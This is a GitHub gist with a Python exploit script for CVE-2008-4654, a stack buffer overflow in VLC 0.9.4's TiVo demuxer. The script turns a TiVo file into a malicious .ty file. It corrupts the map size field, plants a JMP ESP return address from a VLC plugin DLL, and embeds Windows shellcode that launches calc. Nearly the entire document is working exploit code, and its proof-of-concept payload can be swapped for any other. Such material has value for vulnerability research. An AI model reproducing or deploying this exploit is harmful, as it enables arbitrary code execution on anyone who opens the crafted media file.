Created
May 21, 2017 21:30
-
-
Save mgeeky/13ebd90dde9ab5c6446dc27fc51645cf to your computer and use it in GitHub Desktop.
VLC 0.9.4 Stack-Based Buffer Overflow during TiVo file-format demuxing - discovered by Tobias Klein / CVE-2008-4654
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# | |
# VLC 0.9.4 Stack-based Buffer Overflow exploit while demuxing | |
# TiVo file format as it was described by Tobias Klein in his | |
# http://www.trapkit.de/advisories/TKADV2008-010.txt | |
# CVE-2008-4654 | |
# | |
# Shellcode has no bad characters requirements, | |
# but must be at most 187 bytes long. | |
# | |
# Exploit by Mariusz B. | |
# | |
import struct | |
import sys | |
import os | |
# 0x68f0cfad : jmp esp | |
# {PAGE_EXECUTE_READ} [libqt4_plugin.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False | |
RETURN_ADDRESS = 0x68f0cfad | |
TIVO_MAGIC = 0xf5467abd | |
# Aligns ESP stack pointer | |
# push esp | |
# pop eax | |
# sub ax, 0x180 | |
# mov esp, eax | |
STACK_ALIGN = "\x54\x58\x66\x2d\x80\x01\x8b\xe0" | |
# | |
# Shellcode to be used - no bad chars. | |
# It must be at most 187 characters long! | |
# | |
# Below: 112 bytes long CreateProcess("calc") | |
# source: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html | |
# | |
SHELLCODE = ( | |
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" | |
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" | |
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" | |
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" | |
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" | |
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" | |
"\x45\x81\x3e\x43\x72\x65\x61\x75" | |
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" | |
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" | |
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" | |
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" | |
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" | |
"\x6c\x63\x89\xe2\x52\x52\x53\x53" | |
"\x53\x53\x53\x53\x52\x53\xff\xd7" | |
) | |
def replace(data, start, length, what): | |
for (n, r) in zip(range(start, start+length), list(what)): | |
data[n] = r | |
return data | |
def main(argv): | |
if len(argv) == 1: | |
print 'Usag: vlc-exploit.py <tivo-file>' | |
sys.exit(1) | |
data = bytearray() | |
with open(argv[1], 'rb') as f: | |
data = bytearray(f.read()) | |
pos = data.find(str(struct.pack('>I', TIVO_MAGIC))) | |
if pos == -1: | |
print '[!] Not a valid TiVo file.' | |
sys.exit(1) | |
print '[.] Got a valid TiVo file.' | |
# Step 1: Replace TiVo's i_map_size variable in order to trigger out of bounds read. | |
data = replace(data, pos + 20, 4, struct.pack('>I', 0xff)) | |
# Step 2: Prepare a return address as a JMP ESP | |
data = replace(data, pos + 0x5c, 4, struct.pack('<I', RETURN_ADDRESS)) | |
data = replace(data, pos + 0x60, 4, '\x90' * 4) | |
#data = replace(data, pos + 0x60, 4, '\xcc' + '\x90' * 3) # DEBUG the shellcode | |
# Step 3: Insert a shellcode | |
print '[+] Writing {} bytes long shellcode...'.format(len(SHELLCODE)) | |
data = replace(data, pos + 0x64, len(STACK_ALIGN), STACK_ALIGN) | |
data = replace(data, pos + 0x64 + len(STACK_ALIGN), len(SHELLCODE), SHELLCODE) | |
print '[+] Exploit prepared.' | |
new_file = os.path.join(os.path.dirname(argv[1]), os.path.splitext(argv[1])[0] + '-exploit.ty') | |
with open(new_file, 'wb') as f: | |
f.write(data) | |
print '[+] Prepared file: "{}"'.format(new_file) | |
if __name__ == '__main__': | |
main(sys.argv) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment